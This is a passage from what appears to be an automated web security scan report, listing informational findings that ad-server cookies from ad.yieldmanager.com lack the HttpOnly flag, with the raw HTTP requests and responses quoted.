bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f8^!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR*4M6Eq!79C8M#n45; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=0437c6f8-d886-11e0-ae4a-78e7d15f7c8c&_hmacv=1&_salt=1842979857&_keyid=k1&_hmac=a0feea0b76b539d7f6f3647d41d7513f336eb436; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: lifb=M5Jkn#DZT*WZK^n; path=/; expires=Tue, 06-Sep-2011 16:44:52 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1242
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834543);}
</script><script type="t
...[SNIP]...

10.24. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=7PbqlWKJlBXpARpjTl.wjQaFMhd7ak5mFvUAAQwt&Z=160x600&cb=1315313397132599&p=1&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15lgjuenn%2FM%3D787833%2E14485914%2E14323757%2E1471092%2FD%3Dshp%2FS%3D14489115%3ASKY%2FY%3DYAHOO%2FEXP%3D1315320597%2FL%3D7PbqlWKJlBXpARpjTl%2EwjQaFMhd7ak5mFvUAAQwt%2FB%3D%2ENOIQtBDRrc%2D%2FJ%3D1315313397132599%2FK%3DiwgPsw1Pz1yP%5Ftp9hGoa9Q%2FA%3D6284739%2FR%3D0%2F%2A%24&S=14485914&i=140497&D=zip%3D%26ycg%3D%26yyob%3D&_salt=576427757&B=10&u=http%3A%2F%2Fshopping.yahoo.com%2Fsearch%3B_ylt%3DApMQLGDYOT7QlJIA.L4LcHMEgFoB%3Fp%3Dxss%2Bphone%26did%3D0&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=7PbqlWKJlBXpARpjTl.wjQaFMhd7ak5mFvUAAQwt&ad_type=iframe&ad_size=160x600&site=140497&section_code=14485914&cb=1315313397132599&promote_sizes=1&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15lgjuenn/M=787833.14485914.14323757.1471092/D=shp/S=14489115:SKY/Y=YAHOO/EXP=1315320597/L=7PbqlWKJlBXpARpjTl.wjQaFMhd7ak5mFvUAAQwt/B=.NOIQtBDRrc-/J=1315313397132599/K=iwgPsw1Pz1yP_tp9hGoa9Q/A=6284739/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jX5>i; lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0014.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!$=3f=A!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:50:04 GMT
Set-Cookie: vuday1=@n$r#BKZI*BgvR/4M6EqoyOxB!!w[/!79C8On#BA; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=bdffc64e-d886-11e0-a9a3-78e7d15f4cd0&_hmacv=1&_salt=101852862&_keyid=k1&_hmac=9fdc06cf2a43915443ff1f0c6cebd54b7ca38a78; path=/; expires=Thu, 06-Oct-2011 12:50:04 GMT
Set-Cookie: liday1=:%F($!79C883G_v; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:50:04 GMT
Pragma: no-cache
Content-Length: 986
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGlUV2TmjAU.TOdPrSWGBIIWSbTibKiKAp-VPFlJwILaJQobKn768uq7fS95yHnZM69yZx7IbItE5NXgQ2LppBaeGdDpKM0prHYmZ2ubdsIIsNCpmGZnbW5cvh
...[SNIP]...

10.25. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs&Z=728x90&cb=1315313286070877&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15g5hl7jk%2FM%3D787833%2E14486128%2E14323954%2E17%2FD%3Dfin%2FS%3D2142000625%3AN%2FY%3DYAHOO%2FEXP%3D1315320486%2FL%3DDzb%2EVEPDkjnpARpjTl%2EwjQBoMhd7ak5mFoUADygs%2FB%3DpNrGPtGDJHI%2D%2FJ%3D1315313286070877%2FK%3DURqeTfr3zDD1947mBh5eOA%2FA%3D6284681%2FR%3D0%2F%2A%24&S=14486128&i=140440&D=zip%3D%26ycg%3D%26yyob%3D&_salt=2141557690&B=10&u=http%3A%2F%2Ffinance.yahoo.com%2Flookup%3Fs%3Dxss&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs&ad_type=iframe&ad_size=728x90&site=140440&section_code=14486128&cb=1315313286070877&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15g5hl7jk/M=787833.14486128.14323954.17/D=fin/S=2142000625:N/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=pNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6284681/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; ih="b!!!!-!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!79C8fF3yy; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G"; liday1=fh'jT*YKlx8SkUr!79C8jru9X; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:08 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!.!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!$=3f:w!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:48:08 GMT
Set-Cookie: vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!!w[/!79C8S3FdY; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!H<'~$To(/!wVd.!%4<v!#3oe!(O'k~~~~~=3f:w=7y%*!!!%Q"; path=/; expires=Thu, 05-Sep-2013 12:48:08 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=fh'jT*YKlx8SkUrhG%Ln!79C8FW*c%; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:48:08 GMT
Pragma: no-cache
Content-Length: 934
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

